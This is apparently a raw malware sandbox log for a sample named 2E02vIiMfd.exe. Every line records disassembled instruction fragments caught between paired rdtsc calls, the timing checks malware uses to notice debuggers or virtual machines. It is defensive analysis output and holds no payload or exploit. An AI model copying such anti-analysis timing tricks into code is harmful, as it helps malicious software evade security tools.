Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C0757E second address: C07584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C07584 second address: C0758A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CA1488 second address: CA148C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CA67D3 second address: CA67EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8CE6A94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CA67EB second address: CA6807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F07E8D7A962h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CA6807 second address: CA680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CA680B second address: CA680F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CA680F second address: CA6815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CAE06F second address: CAE091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F07E8D7A969h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CAE091 second address: CAE097 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CAC8EC second address: CAC921 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F07E8D7A956h 0x00000008 jp 00007F07E8D7A956h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F07E8D7A95Fh 0x00000016 jp 00007F07E8D7A956h 0x0000001c jl 00007F07E8D7A956h 0x00000022 popad 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 push esi 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CAC921 second address: CAC926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CAC926 second address: CAC92D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CACA96 second address: CACAA8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F07E8CE6A8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CACAA8 second address: CACAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CACBE2 second address: CACBEC instructions: 0x00000000 rdtsc 0x00000002 js 00007F07E8CE6A8Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CACE89 second address: CACE95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F07E8D7A956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CACE95 second address: CACEA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F07E8CE6A86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CAD032 second address: CAD037 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CAD7FE second address: CAD802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB36A3 second address: CB36A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB36A9 second address: CB36AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB36AF second address: CB36B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB36B5 second address: CB36E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F07E8CE6A97h 0x0000000c jmp 00007F07E8CE6A8Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB6869 second address: CB686D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB686D second address: CB687F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F07E8CE6A86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB687F second address: CB6883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB6883 second address: CB6889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB6889 second address: CB6894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB6254 second address: CB6259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB6259 second address: CB6282 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F07E8D7A95Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c jmp 00007F07E8D7A965h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB6282 second address: CB6288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB6564 second address: CB656A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB656A second address: CB6587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F07E8CE6A91h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB6587 second address: CB658B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB658B second address: CB65CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A8Ch 0x00000007 jmp 00007F07E8CE6A97h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F07E8CE6A97h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB7F05 second address: CB7F44 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F07E8D7A95Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007F07E8D7A956h 0x00000014 popad 0x00000015 jnp 00007F07E8D7A95Ch 0x0000001b jmp 00007F07E8D7A964h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB7F44 second address: CB7F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CB7F4A second address: CB7F50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CC35A5 second address: CC35CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jns 00007F07E8CE6A8Eh 0x0000000b jnl 00007F07E8CE6A86h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F07E8CE6A92h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CC35CC second address: CC35D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CC374E second address: CC3752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CC6140 second address: CC6145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CC6145 second address: CC614D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CD0C00 second address: CD0C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CD0C04 second address: CD0C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a jg 00007F07E8CE6A86h 0x00000010 js 00007F07E8CE6A86h 0x00000016 pop ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CDCDFD second address: CDCE35 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F07E8D7A958h 0x00000008 jnp 00007F07E8D7A95Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F07E8D7A964h 0x0000001c jp 00007F07E8D7A95Ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE267C second address: CE269D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F07E8CE6A97h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE269D second address: CE26A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE26A9 second address: CE26B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE26B4 second address: CE26C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jns 00007F07E8D7A95Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE0F77 second address: CE0F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007F07E8CE6A8Eh 0x0000000d jmp 00007F07E8CE6A90h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE0F9F second address: CE0FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE1258 second address: CE125C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE125C second address: CE1266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE13F4 second address: CE1406 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F07E8CE6A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F07E8CE6A86h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE1563 second address: CE1568 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE1568 second address: CE157E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F07E8CE6A86h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F07E8CE6A86h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE157E second address: CE158B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F07E8D7A956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE1706 second address: CE170C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE170C second address: CE1710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE1710 second address: CE1716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE1716 second address: CE1723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F07E8D7A956h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE1887 second address: CE1892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F07E8CE6A86h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE19C1 second address: CE19C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE19C5 second address: CE19CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F07E8CE6A86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE238F second address: CE2395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE4D41 second address: CE4D46 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE723F second address: CE7256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F07E8D7A95Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE7256 second address: CE725C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE725C second address: CE726A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F07E8D7A956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE70ED second address: CE7100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F07E8CE6A86h 0x0000000d jc 00007F07E8CE6A86h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE926E second address: CE92A6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F07E8D7A956h 0x00000008 jmp 00007F07E8D7A95Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F07E8D7A95Ah 0x00000015 push eax 0x00000016 pop eax 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a js 00007F07E8D7A956h 0x00000020 push esi 0x00000021 pop esi 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 je 00007F07E8D7A956h 0x0000002d jnp 00007F07E8D7A956h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CE8F27 second address: CE8F3E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F07E8CE6A99h 0x00000008 jmp 00007F07E8CE6A8Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CED469 second address: CED478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F07E8D7A956h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CED478 second address: CED47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CED47C second address: CED495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8D7A95Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F07E8D7A962h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CED495 second address: CED49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CED49B second address: CED4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F07E8D7A956h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: BF8538 second address: BF855C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F07E8CE6A9Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F07E8CE6A86h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: BF855C second address: BF8565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CED2F3 second address: CED2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CED2F9 second address: CED306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F07E8D7A956h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CED306 second address: CED30A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: CED30A second address: CED31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jbe 00007F07E8D7A964h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D070E4 second address: D070E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D06F3F second address: D06F45 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D06F45 second address: D06F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D09801 second address: D09807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D09807 second address: D0981D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A92h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D0981D second address: D09842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F07E8D7A967h 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F07E8D7A956h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D09842 second address: D09875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F07E8CE6A8Bh 0x0000000c ja 00007F07E8CE6A86h 0x00000012 pop ebx 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F07E8CE6A86h 0x0000001d jmp 00007F07E8CE6A90h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D09875 second address: D09882 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F07E8D7A956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D099F6 second address: D09A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8CE6A8Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D21B09 second address: D21B13 instructions: 0x00000000 rdtsc 0x00000002 je 00007F07E8D7A962h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D21DF5 second address: D21DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
